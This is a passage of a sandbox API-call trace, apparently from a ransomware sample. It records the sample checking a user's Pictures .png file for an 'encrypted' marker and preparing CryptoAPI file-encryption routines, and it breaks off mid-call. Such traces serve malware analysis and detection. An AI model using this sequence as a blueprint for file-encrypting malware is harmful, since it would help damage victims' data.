[0041.410] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0041.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0041.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0041.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0041.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0041.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0041.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0041.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0041.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0041.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0041.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.411] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0041.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0041.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0041.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.411] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.411] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0041.411] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.411] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0041.411] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0041.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.411] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.412] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.412] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.412] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc20e800, ftCreationTime.dwHighDateTime=0x1d5bc9d, ftLastAccessTime.dwLowDateTime=0xfedbce60, ftLastAccessTime.dwHighDateTime=0x1d5b5af, ftLastWriteTime.dwLowDateTime=0xfedbce60, ftLastWriteTime.dwHighDateTime=0x1d5b5af, nFileSizeHigh=0x0, nFileSizeLow=0xbaf4, dwReserved0=0x0, dwReserved1=0x777648, cFileName="pIsPeGCNL7-FJt.png", cAlternateFileName="PISPEG~1.PNG")) returned 0x7c20c0 [0041.412] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.412] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.412] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc20e800, ftCreationTime.dwHighDateTime=0x1d5bc9d, ftLastAccessTime.dwLowDateTime=0xfedbce60, ftLastAccessTime.dwHighDateTime=0x1d5b5af, ftLastWriteTime.dwLowDateTime=0xfedbce60, ftLastWriteTime.dwHighDateTime=0x1d5b5af, nFileSizeHigh=0x0, nFileSizeLow=0xbaf4, dwReserved0=0x0, dwReserved1=0x777648, cFileName="pIsPeGCNL7-FJt.png", cAlternateFileName="PISPEG~1.PNG")) returned 0x7c20c0 [0041.412] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0041.412] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.412] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pIsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IsPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sPeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PeGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eGCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.413] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GCNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CNL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NL7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0041.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-FJt.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0041.414] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.414] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0041.414] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0041.414] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.414] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.414] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.414] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.414] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.414] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0041.414] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.414] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc20e800, ftCreationTime.dwHighDateTime=0x1d5bc9d, ftLastAccessTime.dwLowDateTime=0xfedbce60, ftLastAccessTime.dwHighDateTime=0x1d5b5af, ftLastWriteTime.dwLowDateTime=0xfedbce60, ftLastWriteTime.dwHighDateTime=0x1d5b5af, nFileSizeHigh=0x0, nFileSizeLow=0xbaf4, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="pIsPeGCNL7-FJt.png", cAlternateFileName="PISPEG~1.PNG")) returned 0x7c2100 [0041.414] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0041.415] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.415] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.415] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.415] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.415] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0041.415] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.415] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0041.415] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.415] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.415] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0041.415] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.415] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.415] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.415] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.415] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.415] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0041.415] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.415] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0041.416] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.416] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.416] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0041.416] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.416] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.417] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.417] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.417] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.417] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.417] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.417] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.417] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.417] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.417] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.417] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.417] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0041.417] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.417] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.417] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.417] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.417] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.417] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.417] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.417] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.418] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.418] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.418] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.418] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.418] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.418] PeekMessageW (in: lpMsg=0x6ae83c, 